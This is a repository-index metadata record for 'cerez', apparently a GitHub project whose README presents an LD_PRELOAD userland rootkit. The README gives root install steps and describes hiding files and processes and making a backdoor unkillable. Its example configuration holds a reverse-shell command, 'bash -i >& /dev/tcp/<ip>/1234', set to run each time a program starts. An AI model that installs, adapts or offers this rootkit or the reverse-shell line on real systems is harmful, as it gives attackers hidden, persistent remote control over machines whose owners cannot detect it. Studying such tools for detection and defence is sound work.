{"id":21130840,"url":"https://github.com/ngn13/cerez","last_synced_at":"2025-07-09T01:33:35.007Z","repository":{"id":177073075,"uuid":"655931035","full_name":"ngn13/cerez","owner":"ngn13","description":"Cerez 😈 userland LD_PRELOAD rootkit","archived":false,"fork":false,"pushed_at":"2024-10-13T06:27:28.000Z","size":139,"stargazers_count":18,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-04T14:37:42.851Z","etag":null,"topics":["ld-preload","ld-preload-rootkit","linux-rootkit","rootkit","rootkit-development","rootkit-kernel","rootkits"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ngn13.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-06-19T23:29:01.000Z","updated_at":"2024-12-31T10:10:20.000Z","dependencies_parsed_at":"2023-11-12T21:27:08.855Z","dependency_job_id":"71a76c4a-84f8-48eb-9b77-292b14062378","html_url":"https://github.com/ngn13/cerez","commit_stats":null,"previous_names":["ngn13/cerez"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ngn13/cerez","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ngn13","download_url":"https://codeload.github.com/ngn13/cerez/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264375589,"owners_count":23598410,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ld-preload","ld-preload-rootkit","linux-rootkit","rootkit","rootkit-development","rootkit-kernel","rootkits"],"created_at":"2024-11-20T05:39:59.369Z","updated_at":"2025-07-09T01:33:34.605Z","avatar_url":"https://github.com/ngn13.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003e\n  \u003cimg src=\"assets/showcase.png\"/\u003e\n  \u003cbr\u003e\n  Cerez 😈 Simple userland LD_PRELOAD rootkit\n\u003c/h1\u003e\n\nCerez is a configurable userland `LD_PRELOAD` rootkit, by installing it\ninto `/etc/ld.so.preload`, you can preload it before every binary.\nIt can protect/hide your backdoor as well other files you want\nhidden. It does so by overwriting (g)libc functions such as `open`, `unlinkat` etc.\n\n## Features\n- ✔ Hides files in the file system\n- ✔ Hides your backdoor in the process list\n- ❌ Hides connections in the network list\n- ✔ Makes your backdoor unkillable\n- ✔ Makes files unaccessable\n\n## Install\n\u003e [!Important]\n\u003e Don't forget to edit `cerez.cfg` after the installation\n\n### You will need to install `build-essential` and `libconfig` to compile!\nYou can install it with `apt` on debian based systems:\n```bash\napt update \u0026\u0026 apt install build-essential libconfig-dev\n```\nYou also may want to install git in order to obtain the source.\n\nTo compile the rootkit, run the following commands:\nas **ROOT**:\n```bash\ngit clone https://github.com/ngn13/cerez.git \u0026\u0026 cd cerez\nmake \u0026\u0026 make install\ncd .. \u0026\u0026 rm -rf cerez\n```\nThese commands will compile and install the rootkit and the configuration\nto the system.\n\n## Config (`/etc/cerez.cfg`)\nConfiguration is (really) simple, there are only 3 options:\n\n- `backdoor`: Your backdoor command, this will be run by the rootkit everytime a program starts (if its not already running). Your\nbackdoor will be hidden in the process list. It will also be unkillable.\n- `shell`: The shell that will be used to run the `backdoor` command.\n- `hidden`: A list files that you want to hide and protect. These files will be hidden in directory listings and any attempt access\nthem will fail, and a fake file will be accessed instead.\n\nHere is an example configuration:\n```\nbackdoor = \"bash -i \u003e\u0026 /dev/tcp/\u003cip\u003e/1234 0\u003e\u00261\"\nshell = \"/bin/bash\"\nhidden = (\n  { path = \"/etc/cerez.cfg\" },\n  { path = \"/etc/ld.so.preload\" },\n  { path = \"/path/to/your/super/secret/file\" }\n)\n```\nNote that after hiding `/etc/cerez.cfg` **you won't be able to access it unless you are running as the backdoor process**.\n\n## Resources\nTo learn more about `LD_PRELOAD` rootkits, I highly recommend you read [this\narticle](https://compilepeace.medium.com/memory-malware-part-0x2-writing-userland-rootkits-via-ld-preload-30121c8343d5).\nI also left some comments in the [loader.c](rootkit/loader.c) so you can go ahead and read it.\n\nAlso this is free (as in freedom) software! So feel free to fork and improve the project.\nIf you are interested, you can also contribute back to the project by creaint an issue or a pull request.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Fcerez","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fngn13%2Fcerez","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Fcerez/lists"}